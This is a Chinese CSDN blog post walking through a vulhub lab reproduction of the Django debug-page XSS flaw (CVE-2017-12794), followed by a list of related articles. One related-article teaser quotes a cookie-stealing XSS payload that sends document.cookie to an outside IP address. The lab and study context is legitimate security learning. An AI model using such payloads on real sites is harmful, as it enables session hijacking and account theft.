vulhub靶场漏洞复现——Django-XSS(CVE-2017-12794)

最新推荐文章于 2024-06-20 08:55:02 发布
最新推荐文章于 2024-06-20 08:55:02 发布
阅读量144 收藏
点赞数
分类专栏: vulhub刷题记录 文章标签: django xss python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/pigzlfa/article/details/133173343
版权

Django debug page XSS (CVE-2017-12794)
Django debug page XSS漏洞(CVE-2017-12794)分析

漏洞复现:
启动靶场环境:

docker-compose up -d
docker ps

在这里插入图片描述物理机访问8000端口,是一个404页面在这里插入图片描述创建一个用户

192.168.102.8:8000/create_user/?username=

在这里插入图片描述
刷新页面再次创建用户触发错误弹窗在这里插入图片描述

pigzlfa
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[ vulhub漏洞复现篇 ] Drupal XSS漏洞 (CVE-2019-6341)
qq_51577576的博客
02-21 1453
[ vulhub漏洞复现篇 ] Drupal XSS漏洞 (CVE-2019-6341) Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成,在GPL2.0及更新协议下发布。Drupal在某些情况下,通过文件模块或者子系统上传恶意文件触发XSS漏洞
[ vulhub漏洞复现篇 ] Django debug page XSS漏洞 CVE-2017-12794
qq_51577576的博客
09-29 1788
[ vulhub漏洞复现篇 ] Django debug page XSS漏洞 CVE-2017-12794 DjangoDjango软件基金会的一套基于Python语言的开源Web应用框架。该框架包括面向对象的映射器、视图系统、模板系统等。Django1.10.8之前的版本和1.11.5之前的1.11.x版本中的Technical500Template存在安全漏洞,该漏洞源于程序没有正确的过滤用户提交的输入。远程攻击者可利用该漏洞在浏览器中执行任意脚本代码。
vulhub学习文档-Drupal XSS漏洞
ploto_cs的博客
09-11 1038
Drupal XSS漏洞 一.漏洞介绍 (一)编号 CVE-2019-6341 (二)概述 Drupal诞生于2000年,是一个基于PHP语言编写的开发型CMF(内容管理框架)。在某些情况下,通过文件模块或者子系统上传恶意文件触发XSS漏洞。 (三)影响版本 在7.65之前的Drupal 7版本中; 8.6.13之前的Drupal 8.6版本; 8.5.14之前的Drupal 8.5版本。 (四)漏洞要求 <= Durpal 8.6.6 服务端开启评论配图或者攻击者拥有author以上权限的账号 被
vulhub漏洞复现-jboss反序列化漏洞复现
weixin_45095113的博客
12-21 633
vulhub漏洞复现-jboss反序列化漏洞
黑客零基础第三章-Web漏洞利用实战-vulnhub:xss_and_mysql_file
ShadowBlade
08-23 3575
第七节内容讲述了XSS漏洞和原理,并在DVWA上进行了盗取cookie的实验。本节以实战的方式,结合vulnhub靶机xss_and_mysql_file让大家体验如何用XSS截获cookie进行进一步入侵。这个靶机会涉及到一点SQL注入的知识,但易于理解。后续章节会给大家着重讲解SQL注入。 <script>new Image().src="http://192.168.17.4/test.php?output="+document.cookie;</scr
django/CVE-2017-12794XSS漏洞复现
weixin_56537388的博客
08-31 951
alert(1)
django-xss-cleaner:Django XSS 清理器
07-07
这个类是你的 django 应用程序的 XSS 清理器。 这个类在“ ”地址中再次编写为Django版本的Php函数。 如果您想查看更多信息。 请点击
django-rest-captcha
05-27
Django Rest验证码django-simple-captcha轻量级版本,可与django-rest-framework 。特征速度:使用cache代替数据库安全性:用于生成密钥和图像的联合方法。 (一个键不能生成很多图像) 简单:只需一个rest api...
django-db-connection-pool:Django 的持久数据库连接后端
05-30
django-db-connection-pool Django 的 MySQL & Oracle & PostgreSQL 连接池后端,基于 SQLAlchemy。快速开始使用pip安装所有引擎: $ pip install django-db-connection-pool[all] 或选择特定引擎: $ pip install ...
django-rest-framework-role-filters:django-rest-framework的简单角色过滤
02-05
django-rest-framework-role-filters:django-rest-framework的简单角色过滤
django-registration:Django-registration(redux)为Django网站提供用户注册功能
02-05
django-registration:Django-registration(redux)为Django网站提供用户注册功能
漏洞复现Django_debug page_XSS漏洞(CVE-2017-12794)
过期的秋刀鱼
11-05 583
1.11.5版本,修复了500页面中存在的一个XSS漏洞Django 1.11.5版本。再次刷新页面触发XSS
Python Web实战:Python+Django+MySQL实现基于Web版的增删改查
Avaricious_Bear的博客
06-17 559
在应用sims的视图层文件views.py添加对应学生信息增删改查的处理函数,这里我使用的原生SQL,便于深入理解其执行过程。本质可以理解请求路径url和处理方法的映射配置,首先在项目sms的urls.py文件中添加sims的路由配置。应用创建后要在项目的settings.py文件里的INSTALLED_APPS下面添加smis完成应用注册。在本地MySQL创建sms数据库,修改项目的settings连接信息由默认的sqlite修改为MySQL。稍等片刻,项目的目录结构如下图。生成数据表结构如下所示。
【毕业设计】Django 校园二手交易平台(有源码+mysql数据)
chen695969的博客
06-14 1483
该项目是基于Django的校园二手交易平台开发项目。项目目标是为大学生提供一个安全便捷的校园二手物品买卖平台。项目的主要功能包括用户注册和认证、物品发布和搜索、交易信息管理等。项目开发遵循敏捷开发方法和迭代开发流程,通过持续的迭代和测试逐步改进和扩展功能。
第8天:Django Admin高级配置
最新发布
eclipsercp的博客
06-20 481
通过今天的学习,你应该能够定制Django Admin界面,提高数据管理的效率。明天,我们将学习如何在Django中管理静态文件和媒体文件,这对于构建现代Web应用是必不可少的。
54.Python-web框架-Django-免费模板django-datta-able
智盟科技智能制造团队的博客
06-14 1547
当你在一个基础模板(通常是布局模板)中使用 block 标签时,你实际上是在标记那些可以在继承该基础模板的子模板中自定义内容的部分。这对于实现模板的继承和内容重用至关重要。例如:base.html中定义的{% block content %}{% endblock content %}
Django REST framework序列化器详解:普通序列化器与模型序列化器的选择与运用
啊猪是的读来过倒的博客
06-14 979
Django REST framework 中,数据序列化至关重要。本文将探讨普通序列化器和模型序列化器,了解它们的基本功能和差异,帮助您根据项目需求选择合适的序列化器。
django问题集】django.db.utils.OperationalError: (1040, ‘Too many connections‘)
weixin_46371752的博客
06-14 643
django.db.utils.OperationalError: (1040, 'Too many connections'),mysql配置最大连接数,django报连接数太多
CVE-2017-12794
10-07
CVE-2017-12794是一个影响Django框架的安全漏洞。这个漏洞源于Django框架中的Technical 500 Template没有正确过滤用户提交的输入。攻击者可以利用这个漏洞在浏览器中执行任意的脚本代码,从而导致跨站脚本攻击(XSS)。这个漏洞存在于Django 1.10.8之前的版本和1.11.5之前的1.11.x版本中。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值